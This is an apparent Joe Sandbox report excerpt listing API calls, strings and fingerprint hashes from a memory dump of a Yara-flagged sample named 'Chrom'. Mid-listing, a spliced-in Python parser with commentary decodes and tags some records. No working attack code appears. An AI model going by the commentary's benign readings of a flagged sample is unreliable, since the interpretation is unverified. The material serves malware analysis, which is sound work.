• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000FFF,00000000,00000000,00406E36,00000000,-00000002,0040702A,00000000), ref: 00406D4C
  • Part of subcall function 0040B6F7: strlen.MSVCRT ref: 0040B6FE
  • Part of subcall function 0040B6F7: free.MSVCRT ref: 0040B721
  • Part of subcall function 0040B6F7: free.MSVCRT ref: 0040B752
  • Part of subcall function 0040B6F7: memcpy.MSVCRT(00000000,?,00000000,00000000,00406D5E,?), ref: 0040B77F
• free.MSVCRT ref: 00406D73
Similarity
• API ID: free$memcpy$ByteCharMultiWidememsetstrlenwcslen
• String ID: 6n@
• API String ID: 832090674-1376077705
APIs
• memset.MSVCRT ref: 0040FC3A
• memset.MSVCRT ref: 0040FC51
  • Part of subcall function 0040F0F7: wcscpy.MSVCRT ref: 0040F0FC
  • Part of subcall function 0040F0F7: _wcslwr.MSVCRT ref: 0040F137
• _snwprintf.MSVCRT ref: 0040FC80
Similarity
• API ID: memset$_snwprintf_wcslwrwcscpy
• String ID: </%s>
• API String ID: 3400436232-259020660
APIs
• memset.MSVCRT ref: 0040DA3B
• SetWindowTextW.USER32(?,?), ref: 0040DA6B
• EnumChildWindows.USER32(?,Function_0000D9A3,00000000), ref: 0040DA7B
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
APIs
  • Part of subcall function 0040A1BC: memset.MSVCRT ref: 0040A1C6
  • Part of subcall function 0040A1BC: wcscpy.MSVCRT ref: 0040A206
• CreateFontIndirectW.GDI32(?), ref: 0040176E
• SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040178D
• SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 004017AB
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
Similarity
• API ID: ClassName_wcsicmpmemset
• String ID: edit
• API String ID: 2747424523-2167791130
APIs
• InterlockedCompareExchange.KERNEL32(0045EB90,00000001,00000000), ref: 00417394
• InitializeCriticalSection.KERNEL32(0045EAE8), ref: 004173A4
• Sleep.KERNEL32(00000001), ref: 004173C3
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CompareCriticalExchangeInitializeInterlockedSectionSleep
                                                                                                                                                        • String ID: E
                                                                                                                                                        • API String ID: 4144454223-2089609516
                                                                                                                                                        • Opcode ID: e6fbb2d3d1c0865c93e4ca0e00724d4cc99f07dafa5266e25547b3f1b449e72a
                                                                                                                                                        • Instruction ID: fc88e8258406b36d4da82e75fe45474a615d48495b5640232e67b615d5a4112a
                                                                                                                                                        • Opcode Fuzzy Hash: e6fbb2d3d1c0865c93e4ca0e00724d4cc99f07dafa5266e25547b3f1b449e72a
                                                                                                                                                        • Instruction Fuzzy Hash: 92E04F359492249BEB249B736C087CB3E24AB41703F020037FD19E5553C3A84DC4D6DE
                                                                                                                                                        APIs
                                                                                                                                                        • strcpy.MSVCRT(?,00000000,00000000,00000000,?), ref: 004048BB
                                                                                                                                                        • memcmp.MSVCRT(?,?,00000010,00404E88,00000014,?,0000012F,0000011F,00000010,?,00000000,00000000,?), ref: 0040491E
                                                                                                                                                          • Part of subcall function 00404701: strlen.MSVCRT ref: 00404765
                                                                                                                                                          • Part of subcall function 00404701: memset.MSVCRT ref: 004047B1
                                                                                                                                                          • Part of subcall function 00404701: memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 004047C4
                                                                                                                                                          • Part of subcall function 00404701: memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 004047D7
                                                                                                                                                        • memcmp.MSVCRT(?,?,00000010,00404E88,00000014,0000011F,00000010,?,00000000,00000000,?), ref: 0040494C
                                                                                                                                                        • memset.MSVCRT ref: 0040496B
                                                                                                                                                        • memcpy.MSVCRT(-00000244,?,00000018,00000001,00000268,00000368,00000020,?,?,?,?,00000000,00000000,?), ref: 004049CB
                                                                                                                                                          • Part of subcall function 004045A7: strlen.MSVCRT ref: 00404601
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memcmpmemsetstrlen$strcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1095719737-0
                                                                                                                                                        • Opcode ID: 74240cb5f961abd085359b0634ca8e8dff2a69e9ecdb28326ef061e22fa89259
                                                                                                                                                        • Instruction ID: 9ce700d3882f5f923fbb2479c9cfede1bda771696aaf60353e7394d058dfcfd5
                                                                                                                                                        • Opcode Fuzzy Hash: 74240cb5f961abd085359b0634ca8e8dff2a69e9ecdb28326ef061e22fa89259
                                                                                                                                                        • Instruction Fuzzy Hash: 693165B190070DBEEB20DAB0CC45EDFB7BCEB49304F00443AE655A6181E776AA498B65
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041F7FE
                                                                                                                                                        • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041F814
                                                                                                                                                        • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041F823
                                                                                                                                                        • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041F86B
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041F886
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memcmp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3384217055-0
                                                                                                                                                        • Opcode ID: 37284c2f66642d2ddd48264b57aea92c17a23a416b39e5917ac6500f9f335e0f
                                                                                                                                                        • Instruction ID: eba548dffeb7cbb86d277e9e8be7ea604d675ef8a9d9add480594eb241d03b37
                                                                                                                                                        • Opcode Fuzzy Hash: 37284c2f66642d2ddd48264b57aea92c17a23a416b39e5917ac6500f9f335e0f
                                                                                                                                                        • Instruction Fuzzy Hash: 9D217F76E10208ABDB14EBA6D841EDF73ECAF44704F14482AF516D7181EB38E649C665
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                                        • Opcode ID: 080f722c0ffb7d8c385f632dd20dccb4c50922f07ff88e280dd473830913b811
                                                                                                                                                        • Instruction ID: a4c7653764e20342dfd6e83a4be63b5372cd9455a0b84470ab9be2deaa940da2
                                                                                                                                                        • Opcode Fuzzy Hash: 080f722c0ffb7d8c385f632dd20dccb4c50922f07ff88e280dd473830913b811
                                                                                                                                                        • Instruction Fuzzy Hash: B30128B1A80B007AE3357B35CC43F6A73A4AB91714F010A1EF252966C2DBA8A244817E
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004020E9: GetMenu.USER32(?), ref: 00402107
                                                                                                                                                          • Part of subcall function 004020E9: GetSubMenu.USER32(00000000), ref: 0040210E
                                                                                                                                                          • Part of subcall function 004020E9: EnableMenuItem.USER32(?,?,00000000), ref: 00402126
                                                                                                                                                          • Part of subcall function 00402130: SendMessageW.USER32(?,00000412,?,00000000), ref: 00402147
                                                                                                                                                          • Part of subcall function 00402130: SendMessageW.USER32(?,00000411,?,?), ref: 0040216B
                                                                                                                                                        • GetMenu.USER32(?), ref: 00410AD4
                                                                                                                                                        • GetSubMenu.USER32(00000000), ref: 00410AE1
                                                                                                                                                        • GetSubMenu.USER32(00000000), ref: 00410AE4
                                                                                                                                                        • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410AF0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1889144086-0
                                                                                                                                                        • Opcode ID: b29996890921790c89765a35e80ffc15c9887586477020220e0e376b9c9daa8c
                                                                                                                                                        • Instruction ID: 6d8cac7b40754edf87d272c1bfb0116240dcbcd3534315d38a6e00175b30c6d6
                                                                                                                                                        • Opcode Fuzzy Hash: b29996890921790c89765a35e80ffc15c9887586477020220e0e376b9c9daa8c
                                                                                                                                                        • Instruction Fuzzy Hash: FD518670A40304BBEB209B66CD4AF9FBBF9EB84704F10046DB245772E2C6B56D91D754
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 0041A00F
                                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 0041A03A
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A061
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041A077
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1661045500-0
                                                                                                                                                        • Opcode ID: 4d39a1befb4b444ca1625393fd6a5d283320a0bed10b0f3eee81afd0bc35f62a
                                                                                                                                                        • Instruction ID: 44d3c2b2ec300ebaed5fc3dda4e0471611584753ac233c2b16f5379b4c7cc4bc
                                                                                                                                                        • Opcode Fuzzy Hash: 4d39a1befb4b444ca1625393fd6a5d283320a0bed10b0f3eee81afd0bc35f62a
                                                                                                                                                        • Instruction Fuzzy Hash: C4515A752053029FD724CF25C980AA7BBE5FF88305F10492EF88687651E734ED98CB9A
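The records above list, for each function in the dump based at 00400000, the imported calls with whatever argument constants the plugin could resolve, the referenced strings, and Joe Sandbox's own API/opcode fingerprints. The Python below is an added example, not code from the report or from the sample under analysis. It parses records in this layout, decodes the CreateFileMappingW/MapViewOfFile constants at 0041A00F/0041A03A (flProtect 00000004 is PAGE_READWRITE and dwDesiredAccess 00000006 is FILE_MAP_READ|FILE_MAP_WRITE, so the view is writable but not executable), tags the InterlockedCompareExchange/InitializeCriticalSection/Sleep sequence at 00417394, which reads as a one-time initialisation guard (compare-and-swap from 0 to 1 on a flag, then a one-millisecond Sleep) rather than an evasion sleep, and tags the "sqlite_altertab_%s" / "Cannot add a column to a view" / "virtual tables may not be altered" strings at 00430B8A, which are SQLite's own ALTER TABLE messages. The sample text is a constructed excerpt of three records from this section; the record names, the `triage` tags and the helper functions are the example's own, and the Opcode/Instruction fuzzy hashes are Joe Sandbox's and are not recomputed here.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: three records copied from this section, in the plugin's layout.
SAMPLE = """\
APIs
• InterlockedCompareExchange.KERNEL32(0045EB90,00000001,00000000), ref: 00417394
• InitializeCriticalSection.KERNEL32(0045EAE8), ref: 004173A4
• Sleep.KERNEL32(00000001), ref: 004173C3
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 0041A00F
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 0041A03A
• GetLastError.KERNEL32 ref: 0041A061
• CloseHandle.KERNEL32(00000000), ref: 0041A077
APIs
  • Part of subcall function 00417A12: memset.MSVCRT ref: 00417A2C
• memcpy.MSVCRT(?,?,?), ref: 00430BB9
Strings
• sqlite_altertab_%s, xrefs: 00430B8A
• Cannot add a column to a view, xrefs: 00430B26
• virtual tables may not be altered, xrefs: 00430B10
"""

LABELS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
          "Yara matches", "Similarity"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function ([0-9A-Fa-f]+): )?"
                    r"(\w+)\.(\w+)(?:\(([^)]*)\))?,? ref: ([0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^•\s*(.*), xrefs: ([0-9A-Fa-f]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # None where the plugin printed '?'
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # set for "Part of subcall function X" lines

@dataclass
class FuncRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, int]] = field(default_factory=list)   # (text, xref)

    @property
    def first_ref(self) -> Optional[int]:
        # call site of the first direct call: the address to look up in the dump
        return next((a.ref for a in self.apis if a.subcall_of is None), None)

def parse_arg(tok: str) -> Optional[int]:
    return None if tok.strip() in ("", "?") else int(tok, 16)

def parse_records(text: str) -> List[FuncRecord]:
    """Split the listing into records (each opens with 'APIs') and parse the bullets."""
    records, section, cur = [], None, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line in LABELS:
            if line == "APIs":
                cur = FuncRecord()
                records.append(cur)
            section = line
        elif not line or cur is None:
            continue
        elif section == "APIs" and (m := API_RE.match(line)):
            sub, name, module, args, ref = m.groups()
            cur.apis.append(ApiCall(name, module, [parse_arg(a) for a in args.split(",")] if args else [],
                                    int(ref, 16), int(sub, 16) if sub else None))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur.strings.append((m.group(1), int(m.group(2), 16)))
    return records

# Win32 constants (Windows SDK values) for the two calls decoded below.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
FILE_MAP_BITS = [(0x04, "FILE_MAP_READ"), (0x02, "FILE_MAP_WRITE"), (0x01, "FILE_MAP_COPY"), (0x20, "FILE_MAP_EXECUTE")]

def decode_bits(value: int, table) -> str:
    names = [n for bit, n in table if value & bit]
    return "|".join(names) if names else hex(value)

def describe_mapping(rec: FuncRecord) -> Optional[Tuple[str, str]]:
    """Names for flProtect (CreateFileMappingW arg 3) and dwDesiredAccess (MapViewOfFile arg 2)."""
    create = next((a for a in rec.apis if a.name == "CreateFileMappingW"), None)
    view = next((a for a in rec.apis if a.name == "MapViewOfFile"), None)
    if create is None or view is None or len(create.args) < 3 or len(view.args) < 2:
        return None
    prot, access = create.args[2], view.args[1]
    return ("?" if prot is None else PAGE_PROTECT.get(prot, hex(prot)),
            "?" if access is None else decode_bits(access, FILE_MAP_BITS))

def triage(records: List[FuncRecord]) -> List[Tuple[Optional[int], str]]:
    """Tag records by what their direct API calls and strings show (tags are this example's own)."""
    out = []
    for rec in records:
        names = {a.name for a in rec.apis if a.subcall_of is None}
        if {"InterlockedCompareExchange", "InitializeCriticalSection", "Sleep"} <= names:
            out.append((rec.first_ref, "one-time init guard: CAS on a flag, InitializeCriticalSection, Sleep"))
        mapping = describe_mapping(rec)
        if mapping and "FILE_MAP_WRITE" in mapping[1]:
            out.append((rec.first_ref, f"writable file mapping: {mapping[0]} / {mapping[1]}"))
        if any("sqlite" in text.lower() for text, _ in rec.strings):
            out.append((rec.first_ref, "embedded SQLite (ALTER TABLE messages)"))
    return out
```

Feed `parse_records` the whole function listing of a report (labels and bullets as printed on the page) rather than the excerpt to get one record per function; `first_ref` is the call-site address to look up in the dump, and `triage` is the place to add further API combinations worth flagging, such as PAGE_EXECUTE_READWRITE mappings, which the `describe_mapping` output would name if a record contained one.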
APIs
  • Part of subcall function 00417A12: memset.MSVCRT ref: 00417A2C
• memcpy.MSVCRT(?,?,?), ref: 00430BB9
Strings
• sqlite_altertab_%s, xrefs: 00430B8A
• Cannot add a column to a view, xrefs: 00430B26
• virtual tables may not be altered, xrefs: 00430B10
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpymemset
                                                                                                                                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                        • API String ID: 1297977491-2063813899
                                                                                                                                                        • Opcode ID: 275910ba7e0f0c96ad37673a583fd695216ffdde9dc2204ffc985ed4bb567882
                                                                                                                                                        • Instruction ID: 72999ff3d0cfdfb5e9367ee4ed3faa0f46e6dce2196ea4cba2caab35ae0537ad
                                                                                                                                                        • Opcode Fuzzy Hash: 275910ba7e0f0c96ad37673a583fd695216ffdde9dc2204ffc985ed4bb567882
                                                                                                                                                        • Instruction Fuzzy Hash: 80418E71A00205EFCB08DF59C881A99B7F0FF08314F25966AE848AB352D779ED50CB88
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00406947
                                                                                                                                                          • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
                                                                                                                                                          • Part of subcall function 0040D5E2: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
                                                                                                                                                          • Part of subcall function 0040D5E2: memcpy.MSVCRT(00000000,00000002), ref: 0040D6FA
                                                                                                                                                          • Part of subcall function 0040D5E2: wcscpy.MSVCRT ref: 0040D663
                                                                                                                                                          • Part of subcall function 0040D5E2: wcslen.MSVCRT ref: 0040D681
                                                                                                                                                          • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F
                                                                                                                                                          • Part of subcall function 0040AA19: memset.MSVCRT ref: 0040AA3A
                                                                                                                                                          • Part of subcall function 0040AA19: _snwprintf.MSVCRT ref: 0040AA6D
                                                                                                                                                          • Part of subcall function 0040AA19: wcslen.MSVCRT ref: 0040AA79
                                                                                                                                                          • Part of subcall function 0040AA19: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040AA91
                                                                                                                                                          • Part of subcall function 0040AA19: wcslen.MSVCRT ref: 0040AA9F
                                                                                                                                                          • Part of subcall function 0040AA19: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040AAB2
                                                                                                                                                          • Part of subcall function 0040A7D1: GetOpenFileNameW.COMDLG32(?), ref: 0040A81A
                                                                                                                                                          • Part of subcall function 0040A7D1: wcscpy.MSVCRT ref: 0040A828
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
                                                                                                                                                        • String ID: *.*$dat$x=E
                                                                                                                                                        • API String ID: 3589925243-2636922731
                                                                                                                                                        • Opcode ID: 5b1c68347a222ffadd2cfbfa5b6b642c86afeb0b6d325ee6a9cca5e14e506a85
                                                                                                                                                        • Instruction ID: d7f72c37b5c0960b3a93de2d3de2f44bd36794eda0f7d1f606609bc45afe3b75
                                                                                                                                                        • Opcode Fuzzy Hash: 5b1c68347a222ffadd2cfbfa5b6b642c86afeb0b6d325ee6a9cca5e14e506a85
                                                                                                                                                        • Instruction Fuzzy Hash: DF418671A00205AFDB04FF61DD46A9E77B9FF00318F11C02BF906A71D1EB79A9958B84
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040E814: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,0041079D,?), ref: 0040E835
                                                                                                                                                          • Part of subcall function 0040E814: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,0041079D,?), ref: 0040E8FC
                                                                                                                                                        • wcslen.MSVCRT ref: 004107BB
                                                                                                                                                        • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 004107C7
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00410815
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00410826
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1549203181-0
                                                                                                                                                        • Opcode ID: 521bfcc9bad965401c26efa2b72ae5d9106d53d3b49f8bb5091054076f9510e0
                                                                                                                                                        • Instruction ID: be044668a024ec5caeb14a2b8b02c3aaa195db98e278daf5b9384581b1cfce75
                                                                                                                                                        • Opcode Fuzzy Hash: 521bfcc9bad965401c26efa2b72ae5d9106d53d3b49f8bb5091054076f9510e0
                                                                                                                                                        • Instruction Fuzzy Hash: 08418B31900308EFCB61EF5AC980AD9BBB4EF48315F1144AAEC15DB356D678DAC0CB99
                                                                                                                                                        APIs
                                                                                                                                                        • CoCreateGuid.OLE32(00000000,?,?), ref: 00414F68
                                                                                                                                                          • Part of subcall function 0040AD10: _snwprintf.MSVCRT ref: 0040AD6A
                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00414FB9
                                                                                                                                                        • free.MSVCRT ref: 00415030
                                                                                                                                                        • memcpy.MSVCRT(?,?,00001E38,?,?), ref: 00415063
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
